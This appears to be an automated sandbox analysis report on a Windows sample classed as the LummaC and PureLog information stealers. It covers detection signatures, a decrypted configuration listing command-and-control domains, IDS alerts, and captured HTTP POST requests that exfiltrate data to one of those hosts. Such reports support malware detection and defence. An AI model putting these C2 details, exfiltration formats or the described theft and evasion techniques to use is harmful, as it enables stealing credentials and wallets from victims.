Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mWAik6b.exe

Overview

General Information

Sample name:mWAik6b.exe
Analysis ID:1590828
MD5:16a53e18ca53fe602974f0a4b7ffbf3c
SHA1:8c4b935040158b1ba65a599413b14e8d9e3b975e
SHA256:bb3b567a9f65a64f444738b2c73e8698db247a6b78aa0d1c6ae6cd05bdcc31a9
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LummaC, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mWAik6b.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\mWAik6b.exe" MD5: 16A53E18CA53FE602974F0A4B7FFBF3C)
    • mWAik6b.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\mWAik6b.exe" MD5: 16A53E18CA53FE602974F0A4B7FFBF3C)
    • mWAik6b.exe (PID: 940 cmdline: "C:\Users\user\Desktop\mWAik6b.exe" MD5: 16A53E18CA53FE602974F0A4B7FFBF3C)
    • WerFault.exe (PID: 344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["pain-temper.bond", "crookedfoshe.bond", "strivehelpeu.bond", "immolatechallen.bond", "stripedre-lot.bond", "jarry-fixxer.bond", "growthselec.bond", "cultureddirtys.click", "jarry-deatile.bond"], "Build id": "LPnhqo--zdqcssmdpvku"}
SourceRuleDescriptionAuthorStrings
mWAik6b.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              0.0.mWAik6b.exe.30000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.mWAik6b.exe.34a9550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.mWAik6b.exe.34a9550.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:15:10.078904+010020283713Unknown Traffic192.168.2.549705172.67.150.129443TCP
                    2025-01-14T16:15:11.108776+010020283713Unknown Traffic192.168.2.549706172.67.150.129443TCP
                    2025-01-14T16:15:12.429285+010020283713Unknown Traffic192.168.2.549708172.67.150.129443TCP
                    2025-01-14T16:15:13.839625+010020283713Unknown Traffic192.168.2.549713172.67.150.129443TCP
                    2025-01-14T16:15:15.246349+010020283713Unknown Traffic192.168.2.549715172.67.150.129443TCP
                    2025-01-14T16:15:16.391120+010020283713Unknown Traffic192.168.2.549716172.67.150.129443TCP
                    2025-01-14T16:15:20.742313+010020283713Unknown Traffic192.168.2.549719172.67.150.129443TCP
                    2025-01-14T16:15:29.547266+010020283713Unknown Traffic192.168.2.549760172.67.150.129443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:15:10.627860+010020546531A Network Trojan was detected192.168.2.549705172.67.150.129443TCP
                    2025-01-14T16:15:11.585608+010020546531A Network Trojan was detected192.168.2.549706172.67.150.129443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:15:10.627860+010020498361A Network Trojan was detected192.168.2.549705172.67.150.129443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:15:11.585608+010020498121A Network Trojan was detected192.168.2.549706172.67.150.129443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:15:19.932487+010020480941Malware Command and Control Activity Detected192.168.2.549716172.67.150.129443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://cultureddirtys.click/CAvira URL Cloud: Label: malware
                    Source: https://cultureddirtys.click/wAvira URL Cloud: Label: malware
                    Source: https://cultureddirtys.click/apiAvira URL Cloud: Label: malware
                    Source: https://cultureddirtys.click:443/apindowsAvira URL Cloud: Label: malware
                    Source: cultureddirtys.clickAvira URL Cloud: Label: malware
                    Source: https://cultureddirtys.click/Avira URL Cloud: Label: malware
                    Source: https://cultureddirtys.click:443/apilesAvira URL Cloud: Label: malware
                    Source: https://cultureddirtys.click/apiCAvira URL Cloud: Label: malware
                    Source: 0.2.mWAik6b.exe.34a9550.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pain-temper.bond", "crookedfoshe.bond", "strivehelpeu.bond", "immolatechallen.bond", "stripedre-lot.bond", "jarry-fixxer.bond", "growthselec.bond", "cultureddirtys.click", "jarry-deatile.bond"], "Build id": "LPnhqo--zdqcssmdpvku"}
                    Source: mWAik6b.exeVirustotal: Detection: 29%Perma Link
                    Source: mWAik6b.exeReversingLabs: Detection: 31%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                    Source: mWAik6b.exeJoe Sandbox ML: detected
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: jarry-fixxer.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: pain-temper.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: jarry-deatile.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: growthselec.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: stripedre-lot.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: immolatechallen.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: crookedfoshe.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: strivehelpeu.bond
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: cultureddirtys.click
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString decryptor: LPnhqo--zdqcssmdpvku
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041734A CryptUnprotectData,2_2_0041734A
                    Source: mWAik6b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: mWAik6b.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Windows.Forms.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: Manjohn.pdb source: mWAik6b.exe, WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb$h source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.pdb0= source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.ni.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov eax, ebx2_2_00424050
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+02h]2_2_00427A00
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_0040D22E
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-77h]2_2_0042EAD2
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042E2AC
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h2_2_0041734A
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov edx, ecx2_2_00409B10
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_00441BA0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh2_2_0043A490
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+358FBB0Ch]2_2_0043A5E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00440DF0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h2_2_00440DF0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]2_2_0042A860
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041E800
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov edx, ecx2_2_0043D800
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h2_2_004190C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_004190C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ebx, eax2_2_00405880
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ebp, eax2_2_00405880
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax-5008EDC1h]2_2_0042F093
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0042F093
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then push ebx2_2_0043B0B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp edx, esi2_2_0043B0B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042D150
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-5D5D628Ah]2_2_0040E158
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov word ptr [esi], cx2_2_0040E158
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00418927
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov cl, 0Ch2_2_00418927
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [edx], cl2_2_0042F9CB
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ecx, eax2_2_004091E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_0043D990
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp word ptr [edi+esi+02h], 0000h2_2_004201B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ecx, eax2_2_004269BC
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then jmp eax2_2_00424A40
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov eax, esi2_2_0040AA70
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ecx, edx2_2_0040AA70
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00427230
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx esi, dl2_2_0041A280
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edi, byte ptr [esi]2_2_0041EA90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]2_2_00421290
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]2_2_00440340
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00429374
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_00402B30
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_0042AB3B
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov esi, edi2_2_0042AB3B
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_004073F0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_004073F0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-0F4DCB18h]2_2_0042FB85
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-0F4DCB18h]2_2_0042FB85
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-0F4DCB18h]2_2_0042FB85
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then lea ecx, dword ptr [esp+28h]2_2_004283A6
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ecx, word ptr [esi]2_2_004403B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then inc edi2_2_004403B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042CC70
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then jmp eax2_2_0042A4C7
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042B4E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042D4E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042D4E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then test esi, esi2_2_0043B4A0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then inc edi2_2_004404B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx-4ECF344Eh]2_2_0041655E
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov ecx, eax2_2_0041B560
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041B560
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax-5008EDC1h]2_2_0042F578
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0042F578
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00429DCC
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00437DF0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then lea ecx, dword ptr [esp+28h]2_2_00427D90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0000008Eh]2_2_00427D90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+0000008Eh]2_2_00427D90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00415599
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]2_2_00415599
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then inc edi2_2_004405A0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov edx, dword ptr [esi+000000D8h]2_2_00417DAA
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00426E50
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov dword ptr [esp], 535251F4h2_2_00419E70
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then inc edi2_2_00440630
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then inc edi2_2_004406D0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C18AD805h2_2_0040D6DE
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042DE89
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov edx, eax2_2_00427EAD
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov edi, dword ptr [esp+10h]2_2_0043FEB1
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_0042AF5C
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_00408F70
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then jmp eax2_2_004247C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then mov esi, ecx2_2_004217C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then lea ecx, dword ptr [esp+28h]2_2_00427F95
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+0000008Eh]2_2_00427F95
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-42457FE7h]2_2_0040C7B6

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49716 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.150.129:443
                    Source: Malware configuration extractorURLs: pain-temper.bond
                    Source: Malware configuration extractorURLs: crookedfoshe.bond
                    Source: Malware configuration extractorURLs: strivehelpeu.bond
                    Source: Malware configuration extractorURLs: immolatechallen.bond
                    Source: Malware configuration extractorURLs: stripedre-lot.bond
                    Source: Malware configuration extractorURLs: jarry-fixxer.bond
                    Source: Malware configuration extractorURLs: growthselec.bond
                    Source: Malware configuration extractorURLs: cultureddirtys.click
                    Source: Malware configuration extractorURLs: jarry-deatile.bond
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49760 -> 172.67.150.129:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.150.129:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cultureddirtys.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cultureddirtys.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YM6I1A3CSQRETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: cultureddirtys.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GBQG17QEBFSFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: cultureddirtys.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LIGXB76K4YWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20532Host: cultureddirtys.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PVRY6W5H1M5QJ1ASYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1404Host: cultureddirtys.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O7RCR1HE9Y0FPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572527Host: cultureddirtys.click
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: cultureddirtys.click
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cultureddirtys.click
                    Source: mWAik6b.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: mWAik6b.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: mWAik6b.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: mWAik6b.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: mWAik6b.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: mWAik6b.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: mWAik6b.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: mWAik6b.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
